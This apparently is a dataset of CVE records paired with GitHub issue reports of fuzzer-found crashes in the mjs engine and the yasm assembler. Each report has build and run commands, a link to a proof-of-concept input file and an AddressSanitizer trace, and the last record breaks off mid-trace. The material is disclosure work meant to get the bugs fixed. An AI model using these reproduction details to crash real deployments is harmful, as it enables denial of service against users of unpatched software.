[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-6368-json_printf-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==31649==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000040e9b8 bp 0x7fff1c80ad38 sp 0x7fff1c80abe8 T0) #0 0x40e9b7 in json_printf test/mjs-uaf/build_asan/mjs.c:6396 #1 0x444aee in mjs_jprintf test/mjs-uaf/build_asan/mjs.c:14741 #2 0x44511a in mjs_fprintf test/mjs-uaf/build_asan/mjs.c:14781 #3 0x41dd43 in mjs_print test/mjs-uaf/build_asan/mjs.c:8088 #4 0x7fff1c80af6f (<unknown module>) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:6396 json_printf ==31649==ABORTING ```
A NULL pointer dereference in the function json_printf() mjs.c:6396
https://api.github.com/repos/cesanta/mjs/issues/161/comments
0
2021-05-19T08:39:12Z
2021-05-19T08:39:12Z
https://github.com/cesanta/mjs/issues/161
895,160,290
161
CVE-2021-33443
2022-07-26T13:15:08.847
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow in mjs_execute() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/167" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/167
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-9522-mjs_execute-stack-overflow ASAN info: ```C ASAN:SIGSEGV ================================================================= ==9792==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc50dbbc70 (pc 0x000000425735 bp 0x7ffc50dafdf0 sp 0x7ffc50dbbc78 T0) #0 0x425734 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9650 #1 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #2 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #3 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #4 0x7fa093d7e82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) SUMMARY: AddressSanitizer: stack-overflow test/mjs-uaf/build_asan/mjs.c:9650 mjs_execute ==9792==ABORTING ```
AddressSanitizer: stack-buffer-overflow in mjs_execute mjs.c:9650
https://api.github.com/repos/cesanta/mjs/issues/167/comments
0
2021-05-19T08:44:06Z
2021-05-19T08:44:06Z
https://github.com/cesanta/mjs/issues/167
895,165,377
167
CVE-2021-33444
2022-07-26T13:15:08.887
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in getprop_builtin_foreign() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/166" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/166
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) I think it is probably a similar issue as [#114](https://github.com/cesanta/mjs/issues/114) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-9187-getprop_builtin_foreign-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==9391==ERROR: AddressSanitizer: SEGV on unknown address 0x000004a7dc5d (pc 0x000000423a8c bp 0x7ffe565a5270 sp 0x7ffe565a51b0 T0) #0 0x423a8b in getprop_builtin_foreign test/mjs-uaf/build_asan/mjs.c:9298 #1 0x42407e in getprop_builtin test/mjs-uaf/build_asan/mjs.c:9335 #2 0x424c51 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9485 #3 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #4 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #5 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #6 0x7febbe9ac82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #7 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:9298 getprop_builtin_foreign ==9391==ABORTING ```
A NULL pointer dereference in the function getprop_builtin_foreign() mjs.c:9298
https://api.github.com/repos/cesanta/mjs/issues/166/comments
0
2021-05-19T08:43:21Z
2021-05-19T08:43:21Z
https://github.com/cesanta/mjs/issues/166
895,164,624
166
CVE-2021-33445
2022-07-26T13:15:08.927
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_string_char_code_at() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/169" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/169
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-13891-mjs_string_char_code_at-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==28983==ERROR: AddressSanitizer: SEGV on unknown address 0x618008111179 (pc 0x000000440f53 bp 0x7ffe126104c0 sp 0x7ffe126103c0 T0) #0 0x440f52 in mjs_string_char_code_at test/mjs-uaf/build_asan/mjs.c:14234 #1 0x42572a in mjs_execute test/mjs-uaf/build_asan/mjs.c:9648 #2 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #3 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #4 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #5 0x7fbb2940582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:14234 mjs_string_char_code_at ==28983==ABORTING ```
A NULL pointer dereference in the function mjs_string_char_code_at() mjs.c:14234
https://api.github.com/repos/cesanta/mjs/issues/169/comments
0
2021-05-19T08:45:40Z
2021-05-19T08:45:40Z
https://github.com/cesanta/mjs/issues/169
895,166,975
169
CVE-2021-33446
2022-07-26T13:15:08.967
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_next() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/168" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/168
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) I think it is probably a similar issue as [#105](https://github.com/cesanta/mjs/issues/105) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-12318-mjs_next-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==28197==ERROR: AddressSanitizer: SEGV on unknown address 0x000000007801 (pc 0x0000004328a5 bp 0x7ffdef0a53a0 sp 0x7ffdef0a5360 T0) #0 0x4328a4 in mjs_next test/mjs-uaf/build_asan/mjs.c:12512 #1 0x4250ee in mjs_execute test/mjs-uaf/build_asan/mjs.c:9555 #2 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #3 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #4 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #5 0x7fa1fb47f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:12512 mjs_next ==28197==ABORTING ```
A NULL pointer dereference in the function mjs_next() mjs.c:12512
https://api.github.com/repos/cesanta/mjs/issues/168/comments
0
2021-05-19T08:44:54Z
2021-05-19T08:44:54Z
https://github.com/cesanta/mjs/issues/168
895,166,227
168
CVE-2021-33447
2022-07-26T13:15:09.003
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_print() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/164" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/164
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-7992-mjs_print-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==9049==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000041dcd0 bp 0x7ffd941a9290 sp 0x7ffd941a8fc8 T0) #0 0x41dccf in mjs_print test/mjs-uaf/build_asan/mjs.c:8085 #1 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #2 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #3 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #4 0x7fd3b806982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:8085 mjs_print ==9049==ABORTING ```
A NULL pointer dereference in the function mjs_print() mjs.c:8085
https://api.github.com/repos/cesanta/mjs/issues/164/comments
0
2021-05-19T08:41:39Z
2021-05-19T08:41:39Z
https://github.com/cesanta/mjs/issues/164
895,162,768
164
CVE-2021-33448
2022-07-26T13:15:09.043
An issue was discovered in mjs(mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow at 0x7fffe9049390.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/170" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/170
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-module-stack-overflow ASAN info: ```C ASAN:SIGSEGV ================================================================= ==10560==ERROR: AddressSanitizer: stack-overflow on address 0x7fffe9049390 (pc 0x7fffe9049390 bp 0x00000042572b sp 0x7fffe9049348 T0) #0 0x7fffe904938f (<unknown module>) SUMMARY: AddressSanitizer: stack-overflow ??:0 ?? ==10560==ABORTING ```
AddressSanitizer: stack-buffer-overflow in <unknown module>
https://api.github.com/repos/cesanta/mjs/issues/170/comments
0
2021-05-19T08:46:26Z
2021-05-19T08:46:26Z
https://github.com/cesanta/mjs/issues/170
895,167,796
170
CVE-2021-33449
2022-07-26T13:15:09.083
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_bcode_part_get_by_offset() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/162" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/162
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-7945-mjs_bcode_part_get_by_offset-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==7862==ERROR: AddressSanitizer: SEGV on unknown address 0x00000041bd8c (pc 0x00000041da25 bp 0x7ffcdf11d400 sp 0x7ffcdf11d138 T0) #0 0x41da24 in mjs_bcode_part_get_by_offset test/mjs-uaf/build_asan/mjs.c:8042 #1 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #2 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #3 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #4 0x7f524fe1682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:8042 mjs_bcode_part_get_by_offset ==7862==ABORTING ```
A NULL pointer dereference in the function mjs_bcode_part_get_by_offset() mjs.c:8042
https://api.github.com/repos/cesanta/mjs/issues/162/comments
0
2021-05-19T08:40:02Z
2021-05-19T08:40:02Z
https://github.com/cesanta/mjs/issues/162
895,161,153
162
CVE-2021-33454
2022-07-26T13:15:09.297
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in yasm_expr_get_intnum() in libyasm/expr.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/166" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/166
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#83](https://github.com/yasm/yasm/issues/83) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-1377-yasm_expr_get_intnum-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==12603==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f421b49db7e bp 0x7ffc83d244d0 sp 0x7ffc83d244c0 T0) #0 0x7f421b49db7d in yasm_expr_get_intnum test/yasm-uaf/SRC_asan/libyasm/expr.c:1263 #1 0x7f421b487b9e in bc_align_finalize test/yasm-uaf/SRC_asan/libyasm/bc-align.c:108 #2 0x7f421b48c6ee in yasm_bc_finalize test/yasm-uaf/SRC_asan/libyasm/bytecode.c:176 #3 0x7f421b4b9bd2 in yasm_object_finalize test/yasm-uaf/SRC_asan/libyasm/section.c:528 #4 0x402ca9 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:527 #5 0x402ca9 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #6 0x7f421aeba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #7 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/libyasm/expr.c:1263 yasm_expr_get_intnum ==12603==ABORTING ```
A NULL pointer dereference in the function yasm_expr_get_intnum() libyasm/expr.c:1263
https://api.github.com/repos/yasm/yasm/issues/166/comments
4
2021-05-19T08:22:19Z
2024-03-22T14:15:04Z
https://github.com/yasm/yasm/issues/166
895,143,168
166
CVE-2021-33455
2022-07-26T13:15:09.337
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in do_directive() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/169" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/169
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#142](https://github.com/yasm/yasm/issues/142) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-2352-do_directive-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==14280==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x7f6361db4b98 bp 0x7ffe9673f060 sp 0x7ffe9673ece0 T0) #0 0x7f6361db4b97 in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2355 #1 0x7f6361dc0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #2 0x7f6361da9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7f6361d9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7f6361d8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7f6361d8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 